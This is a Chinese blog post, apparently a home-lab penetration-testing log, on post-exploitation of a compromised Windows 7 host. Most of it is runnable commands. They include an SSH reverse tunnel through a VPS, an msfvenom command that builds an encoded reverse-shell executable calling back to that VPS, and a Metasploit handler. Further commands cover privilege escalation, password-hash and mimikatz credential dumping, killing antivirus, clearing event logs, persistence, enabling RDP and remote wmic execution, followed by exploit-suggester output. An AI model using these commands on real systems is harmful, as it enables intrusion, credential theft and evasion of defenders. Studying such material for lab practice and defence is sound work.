渗透测试系列-本地一-内网测试-第一步-web服务主机渗透

  • by
打算以本地两个+实际两个,共四个渗透实例进行练习,把手法与以前以及现在遇到的细节问题一一解决

本地一 web测试+内网测试
本地二 web测试 10余种web漏洞经典poc
实际一 web测试 (中低)
实际二 web+内网测试 (较低)

本地一:web测试主机win7->win12域控->centos7服务器

本文是本地一的内网测试第一步,以本地一web测试拿到的win7主机进行测试复现

一.vps+本地msf进行内网转发渗透
二.msf进行主机发掘操作
三.补充几个零散收集信息的点
四.提权

一.vps+本地msf进行内网转发渗透

ew+msf,reg+msf,ssh+msf

这里运用ssh+msf

参考:

https://1sparrow.com/2018/01/20/%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91%E6%80%BB%E7%BB%93/
https://evi1cg.me/archives/Port_Forward_using_VPS_SSH_Tunnel.html
https://blog.csdn.net/cayman_mg/article/details/79527207
https://www.zhukun.net/archives/8130
https://www.cnblogs.com/weishun/p/5189339.html
https://www.cnblogs.com/Hi-blog/p/7473752.html
https://www.cnblogs.com/hac425/p/9416774.html

1.本地kali隧道

ssh -N -R 8998:192.168.118.128:8999 root@vps

两点:一是主机ip就本地的ip即可,二是vps上打开的8998要添加进规则(个人这里用阿里云的,一度没有反应,后面用规则内端口,即完成)

2.vps上打开端口转发

本地测试必选才行,vps测试相信效果一样

vim /etc/ssh/sshd_config 改 GatewayPorts yes

3.本地kali的msf开启监听

back
back
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.118.128
set lport 8999
set exitonsession false
exploit -j

4.生成客户端1.exe

冰蝎有反弹,但测试多次,都是直接死亡

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=vps LPORT=8998 -f exe > abc.exe

5.

win7执行1.exe即可

二.msf进行主机发掘操作

参考:

https://www.cnblogs.com/backlion/p/9484950.html
https://www.cnblogs.com/lsgxeva/p/8450277.html

一.提升权限

1.getsystem
meterpreter > getuid
Server username: root-PC\Administrator
meterpreter > getsystem
…got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
2.exp
exit
back
3.窃取用户进程的令牌:
steal_token
4.bypassuac
use exploit/windows/local/bypassuac
5.通过token窃取用户令牌
use incognito
list_tokens –u
impersonate_token

二.获取密码和hash

1.很不错的一个模块
run post/windows/gather/smart_hashdump
2.
load mimikatz
mimikatz_command -f samdump::hashes
3.
hashdump
4.先提升,再hashdump测试
use priv
run post/windows/gather/hashdump
5.得到hash,通过pass-the-hash 技术来进行登陆

三.基本文件操作

cat 查看文件
edit 编辑文件
upload 上传文件
download 下载文件
rm 删除文件
mkdir 创建文件夹
rmdir 删除文件夹

四.信息的持续收集

run killav 杀掉杀毒软件 慎用
run post/windows/gather/checkvm 查看是否是虚拟机
run post/windows/gather/enum_applications #获取安装软件信息
run post/windows/gather/dumplinks #获取最近的文件操作
run scraper 收集一些信息
clearev 清理一些信息

五.权限维持

使用persistence测试,权限维持感觉外链都不怎么好,暂时msf就找到这种方法,其他另说

参考:

https://blog.csdn.net/weixin_44255856/article/details/98983680
https://blog.csdn.net/nzjdsds/article/details/83147361
http://www.secist.com/archives/725.html

三.补充几个零散收集信息的点:

1.如果杀软实在过不了,就powershell抓取密码

2.mimikatz抓取凭据

抓取密码hash

抓取远程终端凭证(个人在win7和win10都没有找到凭证文件),参考:https://www.cnblogs.com/hookjoy/p/9133035.html

黄金票据登陆域控

3.

wce、PSEXEC、WMIEXEC等模拟hash注入(未测试):https://www.cnblogs.com/leixiao-/p/10586804.html

4.谷歌 火狐 ie浏览器的cookies获取

5.wmic命令

转载:https://www.cnblogs.com/top5/p/3143827.html

获得系统版本信息
wmic datafile where Name='c:\\windows\\explorer.exe' get Manufacturer,Version,Filename

获得系统进程
wmic process list full 注意:
这里的full也可以换成brief(简洁)

获得硬件信息(这里以cpu为例)
wmic cpu get name,caption,maxclockspeed,description

将结果输出到d盘的1.txt里面
wmic /output:D:\1.txt cpu get name

wmic 获取硬盘固定分区盘符:
wmic logicaldisk where "drivetype=3" get name

wmic 获取硬盘各分区文件系统以及可用空间:
wmic logicaldisk where "drivetype=3" get name,filesystem,freespace

wmic 获取进程名称以及可执行路径:
wmic process get name,executablepath

wmic 删除指定进程(根据进程名称):
wmic process where name="qq.exe" call terminate
或者用
wmic process where name="qq.exe" delete

wmic 删除指定进程(根据进程PID):
wmic process where pid="123" delete

wmic 创建新进程
wmic process call create "C:\Program Files\Tencent\QQ\QQ.exe"

在远程机器上创建新进程:
wmic /node:192.168.1.10 /user:administrator /password:123456 process call create cmd.exe

关闭本地计算机
wmic process call create shutdown.exe

重启远程计算机
wmic /node:192.168.1.10/user:administrator /password:123456 process call create "shutdown.exe -r -f -m"

更改计算机名称
wmic computersystem where "caption='%ComputerName%'" call rename newcomputername

更改帐户名
wmic USERACCOUNT where "name='%UserName%'" call rename newUserName

wmic 结束可疑进程(根据进程的启动路径)
wmic process where "name='explorer.exe' and executablepath<>'%SystemDrive%\\windows\\explorer.exe'" delete

wmic 获取物理内存
wmic memlogical get TotalPhysicalMemory|find /i /v "t"

wmic 获取文件的创建、访问、修改时间
@echo off
'wmic datafile where name^="c:\\windows\\system32\\notepad.exe" get CreationDate^,LastAccessed^,LastModified

wmic 全盘搜索某文件并获取该文件所在目录
wmic datafile where "FileName='qq' and extension='exe'" get drive,path
for /f "skip=1 tokens=1*" %i in ('wmic datafile where "FileName='qq' and extension='exe'" get drive^,path') do (set "qPath=%i%j" &@echo %qPath:~0,-3%)

获取屏幕分辨率
wmic DESKTOPMONITOR where Status='ok' get ScreenHeight,ScreenWidth

获取共享资源(包括隐藏共享)
WMIC share list brief

获取U盘盘符,并运行U盘上的QQ.exe
@for /f "skip=1 tokens=*" %i in ('wmic logicaldisk where "drivetype=2" get name') do (if not "%i"=="" start d:\qq.exe)

获得进程当前占用的内存和最大占用内存的大小:
wmic process where caption='filename.exe' get WorkingSetSize,PeakWorkingSetSize

更改现有工作组为指定的工作组
wmic computersystem Where "name='计算机名称' call UnjoinDomainOrWorkgroup

退出所在域
wmic computersystem Where "name='计算机名称'" call joindomainorworkgroup "",1,"域名称","域管理员密码","域管理员用户名"

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
开2003的3389
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call
SetAllowTSConnections 1

远程打开计算机远程桌面
wmic /node:%pcname% /USER:%pcaccount% PATH win32_terminalservicesetting WHERE (__Class!="") CALL SetAllowTSConnections 1

添加的计划任务,wmic添加的同样AT命令也是可以看到
wmic job call create "sol.exe",0,0,true,false,********154800.000000+480
wmic job call create "sol.exe",0,0,1,0,********154600.000000+480
这两句是相同的,TRUE可以用1表示,同样的FALSE可以用0值表示,时间前为何用八个星号,这是WMIC的特性,他显示时间的方式是YYYYMMDDHHMMSS.MMMMMM+时区 ,可是,我们并不需要指定年份和月份还有天,所以用*星号来替代

在wmic下查看BIOS信息
wmic bios list full

wmic还有停止、暂停和运行服务的功能:
启动服务startservice,停止服务stopservice,暂停服务pauseservice。
具体的命令使用格式就是:
wmic Service where caption=”windows time” call stopservice
●--停止服务
wmic Service where caption=”windows time” call startservice
●--启动服务
wmic Service where name=”w32time” call stopservice
●--停止服务,注意name和caption的区别。


远程创建进程
wmic
/node:109.254.2.102 /user:"rdgad\administrator" /password:"1234"
process call create commandline="cmd.exe /k echo xxxxx|clip.exe"

6.一些命令

转载:https://blog.csdn.net/qq_29647709/article/details/81514446

1. 收集OS名称和版本信息

systeminfo
systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"

2. 主机名称和所有环境变量

主机名称:hostname
环境变量:SET

3. 查看用户信息

查看所有用户:net user 或者net1 user
查看管理员用户组:net localgroup administrators或者net1 localgroup administrators
查看远程终端在线用户:query user 或者quser


4. 查看远程端口
(1)注册表查看

REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
1
查到的是16进制,需要转换为10进制
(2)通过命令行查看

获取对应的PID号:tasklist /svc | find "TermService"
通过PID号查找端口:netstat -ano | find "1980"



5. 查看网络情况
(1)网络配置情况:ipconfig /all
(2)路由器信息: route print
(3)要查看ARP缓存: arp -A
(4)查看网络连接: netstat -ano
(5)要查看防火墙规则:

netsh firewall show config
netsh firewall show state


6. 应用程序和服务
(1)要查看服务的进程ID:tasklist /SVC
(2)已安装驱动程序的列表:DRIVERQUERY
(3)已经启动Windows 服务net start
(4)查看某服务启动权限:sc qc TermService
(5)已安装程序的列表:wmic product list brief
(6)查看服务列表:wmic service list brief # Lists services
(7)查看进程列表wmic process list brief # Lists processes
(8)查看启动程序列表wmic startup list brief # Lists startup items



7. 检索敏感文件、目录文件操作

dir /b/s password.txt
dir /b /s *.doc
dir /b /s *.ppt
dir /b /s *.xls
dir /b /s *. docx
dir /b /s *.xlsx
dir /b/s config.* filesystem
findstr /si password *.xml *.ini *.txt
findstr /si login *.xml *.ini *.txt

(1)列出d:\www的所有目录:
for /d %i in (d:\www\*) do @echo %i
(2)把当前路径下文件夹的名字只有1-3个字母的显示出来:
for /d %i in (???) do @echo %i
(3)以当前目录为搜索路径,把当前目录与下面的子目录的全部EXE文件列出:
for /r %i in (*.exe) do @echo %i
(4)以指定目录为搜索路径,把当前目录与下面的子目录的所有文件列出
for /r "f:\freehost\hmadesign\web\" %i in (*.*) do @echo %i
(5)显示a.txt里面的内容,因为/f的作用,会读出a.txt中:
for /f %i in (c:\1.txt) do echo %i
9. RAR打包
rar a -k -r -s -m3 c:\1.rar d:\wwwroot
10. php读文件
c:/php/php.exe "c:/www/admin/1.php"



8.自动收集系统有用信息脚本

for /f "delims=" %%A in ('dir /s /b %WINDIR%\system32\*htable.xsl') do set "var=%%A"
wmic process get CSName,Description,ExecutablePath,ProcessId /format:"%var%" >> out.html
wmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName /format:"%var%" >> out.html
wmic USERACCOUNT list full /format:"%var%" >> out.html
wmic group list full /format:"%var%" >> out.html
wmic nicconfig where IPEnabled='true' get Caption,DefaultIPGateway,Description,DHCPEnabled,DHCPServer,IPAddress,IPSubnet,MACAddress /format:"%var%" >> out.html
wmic volume get Label,DeviceID,DriveLetter,FileSystem,Capacity,FreeSpace /format:"%var%" >> out.html
wmic netuse list full /format:"%var%" >> out.html
wmic qfe get Caption,Description,HotFixID,InstalledOn /format:"%var%" >> out.html
wmic startup get Caption,Command,Location,User /format:"%var%" >> out.html
wmic PRODUCT get Description,InstallDate,InstallLocation,PackageCache,Vendor,Version /format:"%var%" >> out.html
wmic os get name,version,InstallDate,LastBootUpTime,LocalDateTime,Manufacturer,RegisteredUser,ServicePackMajorVersion,SystemDirectory /format:"%var%" >> out.html
wmic Timezone get DaylightName,Description,StandardName /format:"%var%" >> out.html

7.开启3389

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f

四.提权

1.参考:https://blog.csdn.net/qq_29647709/article/details/81514446

文中提到的一些漏洞网站:


1.
http://www.securityfocus.com/bid
https://packetstormsecurity.com/search/?q=MS16-016
https://technet.microsoft.com/library/security/ms08-068
http://www.exploit-db.com
2.
http://1337day.com
http://0day.today
http://www.securityfocus.com
http://seclists.org/fulldisclosure/
http://www.exploitsearch.net
http://www.securiteam.com
http://metasploit.com/modules/
http://securityreason.com
https://cxsecurity.com/exploit/
http://securitytracker.com/

2.漏洞和对应的补丁(较少,仅参考):

https://blog.csdn.net/jihaichen/article/details/80223561
https://www.kanxue.com/book-38-435.htm

有一段代码挺有趣的:

systeminfo>micropoor.txt&(for %i in ( KB977165 KB2160329 KB2503665 KB2592799
KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904
KB3134228 KB3143141 KB3141780 ) do @type micropoor.txt|@find /i "%i"|| @echo
%i you can fuck)&del /f /q /a micropoor.txt

3.直接利用msf中的脚本

就是这样直接:(可以明显感觉到post/windows/gather/enum_patches脚本比post/multi/recon/local_exploit_suggester更快)

meterpreter > run post/multi/recon/local_exploit_suggester

[*] 192.168.118.131 - Collecting local exploits for x86/windows...
[*] 192.168.118.131 - 29 exploit checks are being tried...
[+] 192.168.118.131 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.
[+] 192.168.118.131 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 192.168.118.131 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 192.168.118.131 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.118.131 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.118.131 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 192.168.118.131 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 192.168.118.131 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 192.168.118.131 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 192.168.118.131 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
meterpreter > run  post/windows/gather/enum_patches

[+] KB2871997 is missing
[+] KB2928120 is missing
[+] KB977165 - Possibly vulnerable to MS10-015 kitrap0d if Windows 2K SP4 - Windows 7 (x86)
[+] KB2305420 - Possibly vulnerable to MS10-092 schelevator if Vista, 7, and 2008
[+] KB2592799 - Possibly vulnerable to MS11-080 afdjoinleaf if XP SP2/SP3 Win 2k3 SP2
[+] KB2778930 - Possibly vulnerable to MS13-005 hwnd_broadcast, elevates from Low to Medium integrity
[+] KB2850851 - Possibly vulnerable to MS13-053 schlamperei if x86 Win7 SP0/SP1
[+] KB2870008 - Possibly vulnerable to MS13-081 track_popup_menu if x86 Windows 7 SP0/SP1

参考:https://www.360zhijia.com/anquan/422177.html(可以看到msf也是集合了很多有用的脚本)

2019.9.17

标签:

发表评论

电子邮件地址不会被公开。 必填项已用*标注